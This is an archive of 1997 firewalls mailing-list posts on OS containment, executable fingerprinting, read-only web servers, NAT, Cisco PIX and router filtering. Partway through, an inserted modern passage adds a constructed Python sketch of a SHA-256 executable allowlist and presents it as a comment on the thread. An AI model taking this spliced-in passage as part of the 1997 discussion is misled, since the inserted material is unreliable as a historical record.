Well, true and not true. (To be redundant, anything below B2/E4 is not trustworthy.) Just because an OS is high assurance (B2/E4 and above), this doesn't mean that it protects against all things. At best, it only does what it claims to do and no more. To solve this stated problem, the claim must be that you can run untrusted software in a specific "area" such that if the untrusted software is penetrated, the damage is limited to the maximum authority available in the "area" the software was running in. This concept is included in B2 DG/UX and is called "containment." The claim is that when a user enters the system, a maximum "containment area" is assigned to him which can never be extended. When a user is connected to a service such as a web server, that web server is running in the user's containment area when it services the user.
(In brief, the concept of containment is that the system is divided into two parts, that which exists for the user and that which simply does not exist for the user, so there is no way to get to it. Containment is further divided into "sub-containment" areas which define the access rights the user has - read only, write only, read write, etc. This applies to both objects AND to operations. Operations are things like halting the system, stopping auditing, changing a user profile, etc. There are an arbitrary number of containment areas on a system, and they do not have to be predefined - you roll them as you go.)

Thus, if the application breaks, and the user escapes to some user interface (shell, CLI, etc.), the user has no more authority than he had in the application, and he has no way to gain any more, regardless of what passwords he knows or what smart cards he possesses or whatever. Even operating system applications (init, login, etc.) cannot break containment - that is the only way that containment could possibly work. So a high assurance containment OS CAN provide what is being asked for. And when you run web servers and Java interpreters on the high assurance containment OS, it doesn't matter whether it is Unix (as is DG/UX) or NT or ABC. Go look at DG next time you are at a trade show.

BTW, I am the security architect for DG and architected this OS, so this information is correct. Of course, every father's child is beautiful and intelligent! :-)

>
> How about an OS that fingerprinted all its apps, or added extra file
> attributes (not generatable during run-time operation) that were necessary
> for execution. Then if the kernel didn't see this stuff it shuts down.
> This way you could delete from the PRODUCTION system all likely tools
> (chown, chmod, telnet, rxx, mknod, ifconfig, route, etc) and if the villain
> tried to add his/her own the box would croak. I would take that type of
> hardening over B1 any day.
> (Yes you need a non production IE no network
> code kernel for maintenance mode.)
>
> -Charles Kaplan

--
Jon F. Spencer                     spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj)
Data General Corp.                 Phone : (919)248-6246
62 T.W. Alexander Dr, MS #119      FAX   : (919)248-6108
Research Triangle Park, NC 27709   Office RTP 121/9
Reality is an illusion - perception is what counts.
No success can compensate for failure in the home.  President David O. McKay
***** UCC 1-207 ********

From firewalls-owner Mon Jan 6 14:44:06 1997
From: bve@omsk.quadrix.com (BVE)
Date: Mon, 6 Jan 97 17:17:32 EST
To: marcg@arraycomm.com
Cc: firewalls@greatcircle.com
Subject: RE: packet filtering on PPP interfaces
Message-Id: <9701062217.AA04330@omsk.quadrix.com>

I figured that someone would've answered this one by now, but I haven't seen a message on the list....

Is anyone aware of ppp implementations that include packet filtering? Or of (nit-based?) packet filtering implementations that could be applied to a ppp interface under Solaris 1 (Solaris 1.2 to be exact)?

I once set up Morningstar PPP (on SunOs 4.1.3u1) to protect a small Unix box from the Internet. It was a while ago, so I don't remember all the details, but it provided what (at the time) seemed like a fairly good set of features, for that type of software. It was pretty simple to configure.... I don't know if it's good enough for your needs, but it's a place to start....

--
Bill Van Emburg              Phone: 908-235-2335
Quadrix Solutions, Inc.      Fax:   908-235-2336
(bve@quadrix.com)            Check out http://yourtown.com!
(http://quadrix.com)

"You do what you want, and if you didn't, you don't"

From firewalls-owner Mon Jan 6 15:04:15 1997
From: proff@suburbia.net
Date: Tue, 7 Jan 1997 09:53:03 +1100 (EST)
To: spencerj@dg-rtp.dg.com (Jon Spencer)
Cc: ckaplan@nohackers.com, firewalls@greatcircle.com
Subject: Re: NCSA != NCSC
In-Reply-To: <199701062100.QAA10279@splinter.rtp.dg.com> from Jon Spencer at "Jan 6, 97 04:00:33 pm"
Message-ID: <19970106225303.23171.qmail@suburbia.net>

> > How about an OS that fingerprinted all its apps, or added extra file
> > attributes (not generatable during run-time operation) that were necessary
> > for execution. Then if the kernel didn't see this stuff it shuts down.
> > This way you could delete from the PRODUCTION system all likely tools
> > (chown, chmod, telnet, rxx, mknod, ifconfig, route, etc) and if the villain
> > tried to add his/her own the box would croak. I would take that type of
> > hardening over B1 any day. (Yes you need a non production IE no network
> > code kernel for maintenance mode.)
> >
> >
> > -Charles Kaplan

I wouldn't. How about the application sitting in your stack?
-Julian Assange

From firewalls-owner Mon Jan 6 15:08:11 1997
From: "Larson, Erik"
Date: Mon, 6 Jan 1997 17:40:15 -0500
To: "'keithstevens@acsinc.net'", "'Firewalls-Digest@GreatCircle.com'"
Subject: RE: Cisco PIX

I like the PIX in concept and sometimes in practice. I do wish it offered client software to allow remote VPN access, however. That particular feature is critical in much of the work we do for our customer base.

-ekl

>-----Original Message-----
>From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net]
>Sent: Sunday, January 05, 1997 11:14 PM
>To: Firewalls-Digest@GreatCircle.com
>Subject: Cisco PIX
>
>Is there a bastion host / proxy server that out-performs
>Cisco's PIX in throughput? Security? Ease of implementation?
>From my limited perspective as a newbie, the Cisco PIX in
>combination with a good screening router is a very good
>firewall. Not to be a wise guy, I'm seriously asking, with this
>technology available, is there ever a reason to build one from
>scratch? I might be able to do it cheaper - but if it takes a couple
>weeks or a month to do it might cost more. I'm not in any way
>affiliated with Cisco.
>KeithStevens
>keith@acsinc.net
>

From firewalls-owner Mon Jan 6 18:37:09 1997
From: mrwilhe@odin.cmp.ilstu.edu
Date: Thu, 02 Jan 1997 18:59:26 -0600
To: firewalls@GreatCircle.COM
Subject: airfhack--secure/hacked web server
Message-Id: <1.5.4.32.19970103005926.008e412c@odin.cmp.ilstu.edu>

for some reason this was not posted the first time i sent it:

On the idea of the ram mem--it would have to be something special--only changed by physical means (rebooting?)--one could not inflict something of non-physical forces to change the ram. (sorta like bios holding a passwd--you can clear the password by taking the chip out -- yes i know there are ways around this, but something similar for the ram mem/disk would suffice to keep it from being hacked.)

Another statement that was brought up was that cd-rom or other write once or a physical write lock on the hard drive (hd prob more practical) would prevent being able to change the page often-- my statement i made at first was meant for only sites that don't change their pages often -- not pages such as www.news.com. I don't believe that the main pages of the cia/dia/fbi/nsa/ni/and other sites that hold stats.....
change their pages that often.

fsh

<<>>

The following are some of the major points made on this subject (sorry if i left out some).

"Seriously: why not just put it on a separate disk which is mounted
> read-only? If you want to go further, you could buy a suitable harddisk
> which can be write-locked by hardware.
regards:jamie"

" The Web server would have to be based on all write once media -- from the
> Operating systems and all other aspects, otherwise the attacker would just
> redirect the homepage contents to a hard drive.

Doesn't matter, I could just launch a server that redirected you to a site with the content mirrored and altered, or serve the pages out of memory, or off of RAM disk."
From: "Paul D. Robertson"

"A CD-ROM -based web server would be fine if you created web pages, pressed a CD, and then never again expected to add/delete/modify the content. But this is The Real World (tm)."
Mark Johnson

"Not to disagree with anything Paul has said, because I don't, but the original premise was government web sites not high volume web sites. How often does the Air Force's web pages need to change? Not too often I would wager, they don't *need* re-visits, they don't have advertising (at least I would expect they don't, I haven't checked actually), they are there just to provide some mostly static information. Given that, I think there is merit to a write-once media approach. But not, as Paul and others point out, as a general solution."
Dave Kinchlea

[from Michael Idengren:]
> I don't know about the rest of you but I agree with the idea of putting a
> webserver on a CD-ROM.

[from Thomas Leitner:]
> why not just put it on a separate disk which is mounted
> read-only?

[from Dale Drew:]
> Using a CDROM web-server doesn't provide resistance to an
> attacker who gains access to the system as ROOT...

Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server.
In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step.

I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though.

Happy new year (2 minutes to go...),
Norm

1. My comment was partially meant as a joke, it's horribly impractical for ISP's and Universities and such to require operator intervention every time a webpage needs to be updated. Such a level of paranoia *might* only be appropriate for government agencies and authoritative advanced research sites.
From: Michael Idengren

From firewalls-owner Mon Jan 6 18:38:37 1997
From: Kok Seng Tan
Date: Tue, 7 Jan 1997 12:12:24 +1100 (EST)
To: firewalls@greatcircle.com
Subject: ATM Firewalls
Message-Id: <199701070112.MAA16949@strauss.cs.uow.edu.au>

Hi,

I am looking for information on ATM Firewalls. Can anyone help with some references, URLs?

--
==============================================================
Steven K.S. Tan @ The University of Wollongong, NSW, Australia
Email Address : kst01@uow.edu.au
Tel : 61-42-261152
==============================================================

From firewalls-owner Mon Jan 6 18:41:28 1997
From: Matthew Howard
Date: Mon, 06 Jan 1997 18:10:39 -0800
To: "Larson, Erik", "'keithstevens@acsinc.net'", "'Firewalls-Digest@GreatCircle.com'"
Subject: RE: Cisco PIX
Message-Id: <2.2.32.19970107021039.008cb3d8@diablo.cisco.com>

In the mill. The Private Link Encryption card today supports AH/ESP tunnel mode, with DES (cbc). We need to do some additional testing with client software.

matt

At 05:40 PM 1/6/97 -0500, Larson, Erik wrote:
>I like the PIX in concept and sometimes in practice. I do wish it
>offered client software to allow remote VPN access, however. That
>particular feature is critical in much of the work we do for our
>customer base.
>
>-ekl
>
>
>
>>-----Original Message-----
>>From: keithstevens@acsinc.net [SMTP:keithstevens@acsinc.net]
>>Sent: Sunday, January 05, 1997 11:14 PM
>>To: Firewalls-Digest@GreatCircle.com
>>Subject: Cisco PIX
>>
>>Is there a bastion host / proxy server that out-performs
>>Cisco's PIX in throughput? Security? Ease of implementation?
>>From my limited perspective as a newbie, the Cisco PIX in
>>combination with a good screening router is a very good
>>firewall. Not to be a wise guy, I'm seriously asking, with this
>>technology available, is there ever a reason to build one from
>>scratch? I might be able to do it cheaper - but if it takes a couple
>>weeks or a month to do it might cost more. I'm not in any way
>>affiliated with Cisco.
>>KeithStevens
>>keith@acsinc.net
>>
>
>

Matthew Howard               Product Line Manager
mhoward@cisco.com            Internet Business Unit
408-526-4720 (voice)         Cisco Systems Inc.
408-527-8122 (fax)           170 West Tasman Drive
                             Building VM2 (corner of First & Vista Montana)
                             San Jose, CA 95134

From firewalls-owner Mon Jan 6 18:59:08 1997
From: Les Carleton
Date: Mon, 06 Jan 1997 23:04:03 GMT
To: Xavier Fauquet
Cc: firewalls@greatcircle.com
Subject: Re: Using Remote Workstation as Hole??
Organization: The Doghouse
Reply-To: les@tracker.demon.co.uk
Message-ID: <32d982eb.505212@post.demon.co.uk>
References: <19970106081219047.AAA228@kafka.imatranet.com>
In-Reply-To: <19970106081219047.AAA228@kafka.imatranet.com>

On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
>Could someone points me to a site explaining me what is
>Winframe ?

I think ...
http://www.cytrix.com ?

Winframe is a remote processing system which allows PC clients to run server applications on a Windows system rather than using their own processing power.

I think.

...Les...

From firewalls-owner Mon Jan 6 19:19:18 1997
From: Ricardo Alvarado
Date: Fri, 3 Jan 1997 09:20:46 -0600
To: "firewalls@GreatCircle.COM"
Subject: Re: internal filtering router - filter config?

>What type of things would you filter on the internal router? or even
>the external router? I am going to be installing a firewall real soon
>and would really appreciate any help.
>
>-steve.
>matkoski@dreamscape.com

In your external router you'd block any ICMP traffic going back and forth, as well as any packets bearing one of your internal IP addresses as a source address, especially if these are going INTO your protected network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill any ports that your users will not be using, and leave just mail, web, ftp, etc.
ricardo
ralvarado@avantel.com.mx

From firewalls-owner Mon Jan 6 19:23:29 1997
From: "JUAN JOSE JOVER BARBERO"
Date: Fri, 3 Jan 1997 12:01:50 GMT
To: firewalls@greatcircle.com
Subject: help in spanish
Message-Id: <197A811904@neumann.teleco.ulpgc.es>

Please, I don't speak english very well. If anybody knows where I can find books of firewalls in spanish I'll be more happy. Send me directions to obtain those books via ftp or another.

PS: I am doing my final-year degree project at the Universidad de Las Palmas de Gran Canaria and I am a bit lost with English. I appreciate your help.
------------------------------------------------------
UNIVERSIDAD DE LAS PALMAS DE GRAN CANARIA
JUAN JOSE JOVER BARBERO
TELECOMMUNICATIONS ENGINEERING (TECHNICAL DEGREE) STUDENT
------------------------------------------------------

From firewalls-owner Mon Jan 6 20:09:32 1997
From: "James Croall"
Date: Mon, 06 Jan 1997 22:50:01 EST
To: Kok Seng Tan
cc: firewalls@greatcircle.com, jcroall@foo.org
Subject: Re: ATM Firewalls
In-reply-to: Your message of "Tue, 07 Jan 1997 12:12:24 EST." <199701070112.MAA16949@strauss.cs.uow.edu.au>
Message-Id: <199701070350.DAA26466@thor.tjhsst.edu>

In message <199701070112.MAA16949@strauss.cs.uow.edu.au>, Kok Seng Tan writes:
>I am looking for information on ATM Firewalls. Anyone can help with some
>references, URLs ?

Network Systems Corp. seems to have a very interesting product on the horizon. Might want to take a look at www.network.com/netcom/products/security/atm/

---
James B. Croall
jcroall@foo.org

From firewalls-owner Tue Jan 7 03:59:48 1997
From: "Eric K. Dickinson"
Date: Tue, 7 Jan 1997 06:53:30 -0500 (EST)
To: firewalls@greatcircle.com
Subject: Web Site Hacking
Message-Id: <199701071153.GAA17174@nova.dcrt.nih.gov>

I am wondering if this is a suitable solution. Could one not set up a passive defence by overwriting the presented home-pages at a predetermined time and at some other trigger such as a write or copy. Any unauthorized action could also be used as a trigger to just "overwrite". The real home-page could be anywhere accessible only by the OS itself or another hardened location not presented to the world. I am used to the Unix world and have more experience there than NT.

Any Ideas? Thoughts? Or is this out in left field?
eric@nova.dcrt.nih.gov

From firewalls-owner Tue Jan 7 06:14:15 1997
From: Bert Carroll
Date: Tue, 07 Jan 1997 07:43:00 -0600
To: Andrew Hobson
Cc: Michael Warfield, firewalls@GreatCircle.COM
Subject: Re: Christopher Klaus and ISS
References: <199701061733.MAA06710@arden.iss.net>
Message-Id: <32D252E4.155B@90.deere.com>

Like many others I'm not interested in Flaming Chris Klaus or have time to. I still think the subject of web server security needs its own list (not firewalls) and needs a leader (someone smarter than me) to moderate the list.
Bert Carroll
bc17684@90.deere.com

From firewalls-owner Tue Jan 7 07:12:43 1997
From: Darren Cromer
Date: Tue, 7 Jan 1997 06:39:11 -0800
To: "'Xavier Fauquet'", "'les@tracker.demon.co.uk'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: Using Remote Workstation as Hole??

Actually I believe it is www.citrix.com

>----------
>From: Les Carleton[SMTP:les@tracker.demon.co.uk]
>Sent: Monday, January 06, 1997 6:04 PM
>To: Xavier Fauquet
>Cc: firewalls@GreatCircle.COM
>Subject: Re: Using Remote Workstation as Hole??
>
>On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
>>Could someone points me to a site explaining me what is
>>Winframe ?
>
>I think ... http://www.cytrix.com ?
>
>Winframe is a remote processing system which allows PC clients to run server
>applications on a Windows system rather than using their own processing
>power.
>
>I think.
>
>...Les...
>

From firewalls-owner Tue Jan 7 08:00:08 1997
From: long-morrow@CS.YALE.EDU
Date: Tue, 7 Jan 1997 09:51:19 -0500 (EST)
To: ahobson@mindspring.com, bc17684@90.deere.com
Cc: firewalls@GreatCircle.COM, mhw@arden.iss.net
Subject: re: Web server security, was Re: Christopher Klaus and ISS
Message-Id: <199701071451.JAA27171@SPARKY.CF.CS.YALE.EDU>

Bert Carroll wrote:
>Like many others I'm not interested in Flaming Chris Klaus or have time
>to. I still think the subject of web server security needs its own list
>(not firewalls) and needs a leader (someone smarter than me) to moderate
>the list.

I'm not certain how much they talk about specific server security problems (vs. basic HTTP protocol security issues) but I found this in the WWW Security FAQ [http://www-genome.wi.mit.edu/WWW/faqs/wwwsf1.html#Q8] V 1.3.0, Nov 8 1996 by Lincoln D. Stein :

...
A mailing list devoted specifically to issues of WWW security is maintained by the IETF Web Transaction Security Working Group. To subscribe, send e-mail to www-security-request@nsmx.rutgers.edu. In the body text of the message write:

    SUBSCRIBE www-security your_email_address
...
- Morrow

From firewalls-owner Tue Jan 7 09:14:46 1997
From: Steve
Reply-To: Steve@hon.com
Organization: sdg consulting
Date: Tue, 07 Jan 1997 11:54:13 -0500
To: "Eric K. Dickinson"
CC: firewalls@greatcircle.com
Subject: Re: Web Site Hacking
References: <199701071153.GAA17174@nova.dcrt.nih.gov>
Message-ID: <32D27FB5.2F8C@hon.com>

Eric K. Dickinson wrote:
>
> I am wondering if this is a suitable solution. Could one not set up a passive
> defence by overwriting the presented home-pages at a predetermined time and
> at some other trigger such as a write or copy. Any unauthorized action could
> also be used as a trigger to just "overwrite". The real home-page could be
> anywhere accessible only by the OS itself or another hardened location not
> presented to the world. I am used to the Unix world and have more experience
> there than NT.
>
> Any Ideas? Thoughts? Or is this out in left field?
>
> eric@nova.dcrt.nih.gov

Eric,

A very interesting thought..but firewalls are supposed to prevent users from being able to tamper in the first place. But, I for one am going to give that more serious consideration as I see its possibilities for use on maybe another machine on the LAN to check on the status of say a web server.

Thanks for the idea..
Steve
Steve@hon.com
sdg consulting

From firewalls-owner Tue Jan 7 11:44:51 1997
From: oconnor@reston.ans.net
Date: Tue, 7 Jan 1997 14:10:05 -0500
To: firewalls@greatcircle.com
Cc: eric@nova.dcrt.nih.gov, Steve@hon.com
Subject: Re: Web Site Hacking
Message-Id: <199701071913.AA02945@interlock.reston.ans.net>

Today's Washington Post had a brief article regarding the ForceField product from TIS which is apparently intended to address this issue. Unfortunately you have to register to find out anything specific about the package, e.g. which OS it replaces/augments. They do tell you the price however :-). I've registered but the implication is that the more specific information will be sent surface mail.
Mike

From firewalls-owner Tue Jan 7 12:26:56 1997
From: Wilner@DOCKMASTER.NCSC.MIL
Date: Tue, 7 Jan 97 14:53 EST
To: firewalls@GREATCIRCLE.COM
Subject: Re: Re: NCSA != NCSC
Message-ID: <970107195334.971794@DOCKMASTER.NCSC.MIL>

> I have to say up front that I agree with MJR.
>
> . . . if the firewall software is implemented below the O/S layer
> . . . then the O/S will never even "see" . . .

Everything except boot-up depends upon the O/S. Nothing is below the "O/S layer," nor does one speak of such a layer unless one intends "application layer" and doesn't know an application from an O/S, nor can a single byte be sent or retrieved over a device (networked or otherwise) unless an O/S is relied upon, nor can a single access to memory, disk, or what-have-you be performed by networking code "below the O/S layer," as we so quaintly say, if there is no O/S involved.

Gentlemen, if this represents your understanding of operating systems and security, please contribute to alt.brush-sellers, not to firewalls.
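The executable-fingerprinting idea argued over in this NCSA != NCSC sub-thread (Charles Kaplan's proposal that the kernel refuse to run anything it cannot verify, and Julian Assange's objection about code already sitting in the application's stack) can be sketched in userland as a digest-manifest check. The following is an added example, not code from any list member or product mentioned: it builds a SHA-256 manifest of a constructed bin/ tree, then shows how a modified binary and an unlisted one are both refused while untouched ones pass. The file names, their contents, and the function names (build_manifest, check_executable, demo) are all constructed for this illustration.

```python
"""Executable allowlist check: a userland sketch of "fingerprint all the apps".

Constructed example. A manifest records the SHA-256 digest of every file in a
trusted tree; an exec request is honoured only if the requested path is in the
manifest and its current digest matches.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Return the hex SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Record the digest of every regular file under root, keyed by relative path.

    In a real deployment this would be generated on the maintenance kernel and
    stored somewhere the production system cannot rewrite.
    """
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def check_executable(root, relpath, manifest):
    """Decide whether an exec request for relpath should be honoured.

    Returns (allowed, reason). Anything not listed, missing, or whose digest
    differs from the recorded one is refused.
    """
    full = os.path.join(root, relpath)
    if relpath not in manifest:
        return False, "not in manifest"
    if not os.path.isfile(full):
        return False, "missing"
    if sha256_file(full) != manifest[relpath]:
        return False, "digest mismatch"
    return True, "ok"


def demo():
    """Constructed scenario: take a manifest, then simulate tampering and an unlisted file."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        # Two stand-in "binaries" (constructed shell stubs, not real programs).
        with open(os.path.join(root, "bin", "httpd"), "wb") as f:
            f.write(b"#!/bin/sh\necho serving\n")
        with open(os.path.join(root, "bin", "sendmail"), "wb") as f:
            f.write(b"#!/bin/sh\necho mail\n")

        manifest = build_manifest(root)
        results = {}
        results["httpd_clean"] = check_executable(root, "bin/httpd", manifest)

        # Simulated tampering: a listed binary is modified after the manifest was taken.
        with open(os.path.join(root, "bin", "httpd"), "ab") as f:
            f.write(b"echo modified\n")
        results["httpd_tampered"] = check_executable(root, "bin/httpd", manifest)

        # Simulated addition: a file that was never in the manifest appears.
        with open(os.path.join(root, "bin", "extra"), "wb") as f:
            f.write(b"#!/bin/sh\n")
        results["extra_unlisted"] = check_executable(root, "bin/extra", manifest)

        # An untouched listed binary still passes.
        results["sendmail_clean"] = check_executable(root, "bin/sendmail", manifest)
        return results


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name:16s} allowed={allowed!s:5s} {reason}")
```

Two limits of this check line up with the thread's own arguments: it runs at exec time, so code that arrives inside an already-running process never passes through it, which is Assange's point; and the manifest is only as trustworthy as the place it is kept, which is where the read-only media discussion in the other thread comes in.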
From firewalls-owner Tue Jan 7 12:27:52 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA04208 for firewalls-outgoing; Tue, 7 Jan 1997 11:30:43 -0800 (PST) Received: from eagle.anheuser-busch.com ([151.145.250.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA04199 for ; Tue, 7 Jan 1997 11:30:34 -0800 (PST) Received: (from smap@localhost) by eagle.anheuser-busch.com (8.7.5/8.6.12) id NAA10490 for ; Tue, 7 Jan 1997 13:24:27 -0600 (CST) Received: from stlabcexg001.anheuser-busch.com(151.145.101.151) by eagle.anheuser-busch.com via smap (V1.3) id sma010488; Tue Jan 7 13:24:03 1997 Received: by stlabcexg001.anheuser-busch.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFC9E.C4FA4930@stlabcexg001.anheuser-busch.com>; Tue, 7 Jan 1997 13:29:12 -0600 Message-ID: From: "Starkweather, Mike" To: "'firewalls@GreatCircle.COM'" Subject: Pointcast Date: Tue, 7 Jan 1997 13:29:08 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am wondering how the members of this mail list have handled the flood of traffic generated by Pointcast. It has buried our firewall (Tis Toolkit) with the huge number of requests it generates. Their I-Server seems to help some but not as much as I had hoped. If this is the wrong place for this question please redirect me. 
Mike Starkweather Anheuser-Busch From firewalls-owner Tue Jan 7 13:04:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA05146 for firewalls-outgoing; Tue, 7 Jan 1997 11:55:01 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA05133 for ; Tue, 7 Jan 1997 11:54:49 -0800 (PST) Received: by smartwall.v-one.com; id OAA25378; Tue, 7 Jan 1997 14:54:29 -0500 (EST) Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma025373; Tue, 7 Jan 97 14:54:27 -0500 Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFCAA.EA5772A0@nt_fs1.V-ONE.COM>; Tue, 7 Jan 1997 14:56:08 -0500 Message-ID: From: "McMahan, Peg" To: "'Firewalls Mailing List'" , "'Carl Karlsson'" Subject: RE: NT NAT Date: Tue, 7 Jan 1997 14:56:07 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >---------- >From: Carl Karlsson[SMTP:ckn@findata.se] >Sent: Friday, January 03, 1997 11:43 AM >To: 'Firewalls Mailing List' >Subject: RE: NT NAT > > >On Fri, 3 Jan 1997, Russ wrote: > >> You got anything intelligent to say on just why you think NAT offers ANY >> SECURITY AT ALL??? I can't wait to hear it. I mean ANY SECURITY AT ALL. > >I'd like to know if and why this means that masquerading one's network >behind a 'secured' host doesn't provide any added security from just >connecting the network straight out? Or am I missing something here (not >unusual :)? >I was under the impression that if I use some box (Linux with TIS fwtk for >example, or that NT box perhaps?) 
masquerading my network and using >192.168.x.x-addresses inside, I would be at least a little bit more secure >than if I had all my w95/nt/unix machines directly connected to the >internet?

A hacker will know if those machines are there or not... Most people who don't know too much about the net wouldn't think anything of there possibly being more machines behind the firewall... however, hackers will... I suppose you could toss this under the 'security through obscurity' theme, but.... time has taught us that doesn't work. Hackers are very curious beings and will find just about anything, no matter how well you think you've hidden it. Machines that are masqueraded? That's nothing. The people that wouldn't even think about anything being hidden that way wouldn't be able to hack the machines anyway. That's my opinion anyhow, and I'll stick to it.

>(Not talking super-secure here, not flaming anyone, but just interested! >Pointers do nicely if this is already well-known...)

No, not talking super secure.... but that's the type of security that the only people that would be fooled wouldn't know how to hack those hidden machines anyway.
From firewalls-owner Tue Jan 7 13:10:15 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA05838 for firewalls-outgoing; Tue, 7 Jan 1997 12:15:15 -0800 (PST) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA05831 for ; Tue, 7 Jan 1997 12:15:06 -0800 (PST) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA29320; Tue, 7 Jan 1997 15:14:00 -0500 (EST) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA27798; Tue, 7 Jan 1997 15:13:54 -0500 (EST) Date: Tue, 7 Jan 1997 15:13:54 -0500 (EST) Message-Id: <199701072013.PAA27798@SPARKY.CF.CS.YALE.EDU> To: firewalls@greatcircle.com, oconnor@reston.ans.net Subject: Re: Web Site Hacking Cc: Steve@hon.com, eric@nova.dcrt.nih.gov Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Today's Washington Post had a brief article regarding the ForceField product >from TIS which is apparently intended to address this issue. Unfortunately >you have to register to find out anything specific about the package, e.g. >which OS it replaces/augments. They do tell you the price however :-). I've >registered but the implication is that the more specific information will >be sent surface mail. According to the TIS Web page on Gauntlet ForceField ( http://www.tis.com/docs/products/gauntlet/forcefield/index.html ) if you register they will give you a free evaluation copy of the software available in January. 
- Morrow

From firewalls-owner Tue Jan 7 13:18:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06434 for firewalls-outgoing; Tue, 7 Jan 1997 12:30:53 -0800 (PST) Received: from www.biella.alpcom.it (www.biella.alpcom.it [194.243.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06424 for ; Tue, 7 Jan 1997 12:30:24 -0800 (PST) Received: from ferraris.biella.alpcom.it by www.biella.alpcom.it; (5.65v3.2/1.1.8.2/05Mar96-0237PM) id AA23604; Tue, 7 Jan 1997 21:30:06 +0100 Message-Id: X-Mailer: XFMail 1.0 [p0] on Linux Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Mime-Version: 1.0 In-Reply-To: <199612312101.NAA17474@miles.greatcircle.com> Date: Mon, 06 Jan 1997 16:53:57 +0100 (MET) Organization: ENTE NAZIONALE DI DERATTIZZAZIONE From: Andrea Ferraris To: uskanbye@ibmmail.com Subject: Re: Air Force Web Site Hacked Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>I have not set one up yet (Planned for July), but I believe you can have >a totally CDROM machine, at least using Novell or NT. Bootable CDROMs >and all data on CDROM so you would not have any writable media.

You could use - maybe - Linux from Caldera too. Some months ago, they worked on booting systems from CDROM with Adaptec 2940 controllers. But I can't figure out what the use of a diskless server can be. I think also that you must get more RAM because of the lack of disk space for swapping. In any case you shouldn't give my thoughts much consideration because I'm not an expert.
Regards, Andrea

---------------------------------- E-Mail: Andrea Ferraris Date: 06-Jan-97 Time: 16:53:57 This message was sent by XFMail ----------------------------------

From firewalls-owner Tue Jan 7 13:22:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA06433 for firewalls-outgoing; Tue, 7 Jan 1997 12:30:49 -0800 (PST) Received: from pecos-int.iphase.com (pecos.iphase.com [157.175.3.200]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id MAA06416 for ; Tue, 7 Jan 1997 12:30:21 -0800 (PST) Received: by pecos-int.iphase.com; id AA04950; Tue, 7 Jan 97 14:30:03 CST Received: from rio.iphase.com(157.175.2.200) by pecos.iphase.com via smap (3.2) id xma004947; Tue, 7 Jan 97 14:29:58 -0600 Received: by rio.iphase.com; id AA20501; Tue, 7 Jan 97 14:29:56 CST Received: from chip (chip-fddi.iphase.com) by que.iphase.com.iphase.com (4.1/SMI-4.1) id AA06653; Tue, 7 Jan 97 14:29:55 CST Message-Id: <32D2B242.167EB0E7@iphase.com> Date: Tue, 07 Jan 1997 14:29:54 -0600 From: Patrick Larkin Jr Organization: Interphase Corporation X-Mailer: Mozilla 3.0 (X11; I; SunOS 4.1.3 sun4c) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: [Fwd: Re: Web Site Hacking] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM 